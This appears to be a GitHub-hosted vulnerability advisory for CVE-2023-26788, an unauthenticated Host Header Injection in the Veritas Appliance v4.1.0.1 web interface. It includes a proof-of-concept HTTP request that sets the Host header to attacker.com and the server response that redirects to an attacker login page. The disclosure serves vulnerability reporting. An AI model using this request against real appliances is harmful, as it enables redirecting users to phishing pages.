Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
Host Header Injection (HHI) Attack - CVE-2023-26788
---------------------------------------------------
Version: Veritas Appliance v4.1.0.1
Type: Unauthenticated Remote attack
We have identified that the "Veritas Appliance v4.1.0.1" web interface is affected by Host Header Injection attacks. HTTP host header can be manipulated and cause the application to behave in unexpected ways. Any changes made to the header would just cause the request to be sent to a completely different Domain/IP address. This is due to that the server implicitly trusts the Host header, and fails to validate or escape it properly.
An attacker would be able to tamper the Host Header value during HTTP request interception (MiTM attack), and then the attacker’s domain will be added in the web page code for redirection, thus forcing the victim’s web browser to redirect to the attacker's domain/malicious web page. This would result in expanding the potential to further attacks and malicious actions.
Below, evidence is provided.
Request:
GET / HTTP/1.1
Host: attacker.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 0
Origin: https://172.16.4.100
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Response:
HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Thu Jun 7 11:45:03 2018
Cache-Control: no-cache, no-store, must-revalidate,private
Pragma: no-cache
Expires: 0
Content-Type: text/html
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Location: https://attacker.com/login.asp
<html><head></head><body>
This document has moved to a new <a href="https://attacker.com/login.asp">location</a>.
Please update your documents to reflect the new location.
</body></html>